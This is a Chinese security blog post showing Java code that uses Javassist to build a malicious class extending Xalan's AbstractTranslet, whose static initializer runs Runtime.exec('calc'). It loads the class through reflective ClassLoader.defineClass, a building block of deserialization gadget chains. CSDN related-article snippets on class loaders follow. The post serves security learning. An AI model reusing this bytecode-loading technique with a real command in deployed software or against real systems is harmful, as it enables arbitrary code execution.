利用defineClass加载字节码

于 2023-12-29 12:00:00 发布
阅读量470 收藏 10
点赞数 14
文章标签: web安全 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/135198051
版权 
package com.naihe;

import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class DC {
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, InstantiationException, NotFoundException, CannotCompileException, IOException {
        //通过字节码构建恶意类
        ClassPool classPool=ClassPool.getDefault();
        String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
        classPool.appendClassPath(AbstractTranslet);
        CtClass payload=classPool.makeClass("CommonsCollections3");
        payload.setSuperclass(classPool.get(AbstractTranslet));
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");
        byte[] code=payload.toBytecode();

        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        defineClass.setAccessible(true);
        Class yyds= (Class) defineClass.invoke(ClassLoader.getSystemClassLoader(), "CommonsCollections3", code, 0, code.length);
        yyds.newInstance();

    }
}

 

网安星星
关注
  • 14
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ASM字节码操作简单实例
06-21
6. **生成字节码加载到JVM**:最后,`ClassWriter`的`toByteArray`方法会生成字节码数组,然后可以使用`ClassLoader`的`defineClass`方法将字节码转换为类。 这个简单示例可能仅涉及一个或两个方法的增强,但实际...
浅谈Java中DefineClass方法以及ClassLoader
weixin_38526093的博客
04-04 4790
一、反射调用ClassLoader类的defineClass方法直接根据字节数组定义一个类 package org.hope; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; import java.net.URL; import java.net.URLClassLoader; public class Main2{ public static void main(St
利用ClassLoader#defineClass动态加载字节码
Thunderclap的博客
02-07 2562
利用ClassLoader#defineClass直接加载字节码,底层调用原理。
ClassLoader与字节码
Christ1na的博客
10-04 531
ClassLoader为类加载器,它是用来加载 Class 的。字节码可以来自于磁盘文件 *.class,也可以是 jar 包里的 *.class,也可以来自远程服务器提供的字节流,字节码的本质就是一个字节数组 []byte,它有特定的复杂的内部格式。当类初始化的时候,类的static块中的代码会执行,但是defineClass被调用时,类对象是没有被初始化的,只有这个对象显式地调用其构造函数,初始化代码才能被执行,我们用反射调用其构造函数,成功执行放在static中的代码。
简单说说java中的反射
cz2423415723的博客
03-27 747
反射就是把Java类中的各个组成部分进行解剖,并映射成一个个的Java对象,拿到这些对象后可以做一些事情。 既然说反射是解剖Java类中的各个组成部分,所以说咱们得知道一个类中有哪些部分? 一个类里一般有构造函数、方法、成员变量(字段/属性)这三部分组成 Class类 实际上,我们创建的每一个类也都是对象,即类本身是java.lang.Class类的实例对象。 这个实例对象称之为类对象,也就是Class对象。 Class类本身没有构造方法,得到Class类实例的3种方式 **(1)、Cla..
自定义类加载
08-07
在Java编程语言中,类加载器(ClassLoader)是运行时环境的一个重要组成部分,它负责将类的字节码从各种来源加载到Java虚拟机(JVM)中,从而使得程序可以执行。自定义类加载器允许开发人员根据特定需求定制加载类的...
自定义类加载器实现自定义加载
01-27
- 定义类:调用`defineClass()`方法将字节码转换为Class对象。 3. **自定义类加载器的应用场景** - 加载非标准路径的类:例如,从网络、数据库或本地的非标准目录加载类。 - 动态加载与热部署:在运行时加载新...
java 类加载器 加密
10-17
Java 类加载器是Java运行时环境的一个重要组成部分,它的主要职责是将编译后的字节码(.class文件)加载到JVM中,使得程序能够运行。类加载器的机制保证了类的唯一性,同时也提供了灵活性,允许我们自定义加载逻辑。...
JAVA动态加载JAR zip包
07-24
如果该类还没有被加载,此方法会调用`defineClass()`,将字节码转换为Class对象。 2. **读取JAR或ZIP文件** - 使用`java.util.zip`包中的`ZipFile`类来打开和读取ZIP或JAR文件。通过`ZipFile.entries()`获取所有...
加载器中findClass与loadClass的区别?
cqc__c的博客
08-11 8816
findClass()用于写类加载逻辑、loadClass()方法的逻辑里如果父类加载加载失败则会调用自己的findClass()方法完成加载,保证了双亲委派规则。 1、如果不想打破双亲委派模型,那么只需要重写findClass方法即可 2、如果想打破双亲委派模型,那么就重写整个loadClass方法 ...
java自定义类加载器(findClass和loadClass这两个方法的差别)
热门推荐
z173273946的博客
01-23 1万+
package huang.de.wei; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; public cla
java defineclass1_Java字节码检测:反射调用defineClass时出现NullPointerException
weixin_29451671的博客
02-23 453
意图:我正在使用java.lang.instrument包为Java程序创建一些工具.我的想法是我通过这个系统使用字节码操作,以便在每个方法的开头和结尾添加方法调用.一般来说,修改后的Java方法看起来像:public void whateverMethod(){MyFancyProfiler.methodEntered("whateverMethod");//the rest of the me...
在运行时刻从文件中调入Class(defineClass 的使用)
u011119684的博客
12-11 1780
了解JAVA的类装载器:    Java 编程语言编译器把源代码代码转换成为一个假定机器(即虚拟机)上的 机器语言。虚拟机代码保存在一个后缀为.class的类文件中。每个类文件保存这 个类的所有方法的虚拟机代码。    当运行时用一个解释程序解释这些类文件,把这些文件内的虚拟机指信信令翻 译成本地的机器语言,分存内存,确定程序入口点。    类装载器功能类似与C
[Java安全]Java动态加载字节码
cosmoslin的博客
04-07 733
什么是java字节码 严格来说,Java字节码ByteCode)其实仅仅指的是Java虚拟机执行使用的一类指令,通常被存储在.class文件中。 这里所有能够恢复成一个类并在JVM虚拟机里加载的字节序列,都在我们的探讨范围内。 利用URLClassLoader加载远程class文件 这个很基础,直接上代码: 先编写一个evil.java并编译为class文件,python开一个http服务 import java.io.IOException; public class evil { publi
defineClass使用文档
为你超神
03-03 4132
API defineClass(classDeclaration, instanceMethods, classMethods) @param classDeclaration: 字符串,类名/父类名和Protocol @param instanceMethods: 要添加或覆盖的实例方法 @param classMethods: 要添加或覆盖的类方法 覆盖方法 1.在
加载字节码的几种方式
Demodd的博客
03-22 4378
前言 要学shiro发现要会cc3,要会cc3发现要先学字节码哈哈哈 正文 利用ClassLoader加载远程字节码 poc import java.io.IOException; import java.net.MalformedURLException; import java.net.URL; import java.net.URLClassLoader; public class ClassLoader { public static void main(String[] args) t
loadClass,findClassdefineClass
u011119684的博客
12-11 4490
loadClass(String name);根据cn.com.akl.DemoController查找并加载类。先在parent或bootstrap中查找,有则给jvm加载。没有则按照findClass方法查找。findClass();默认抛出一个ClassNotFoundException,如果需要自己重新覆盖实现。 defineClass();是将你定义的字节码文件经过字节数组流解
java传入字节码返回对应的类型
最新发布
03-30
Java中可以使用Class类的静态方法forName()传入类的全限定名或者字节码文件路径来获取对应的Class对象,然后可以调用Class对象的newInstance()方法来创建该类的实例对象。例如: ``` byte[] bytes = // 读取字节码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值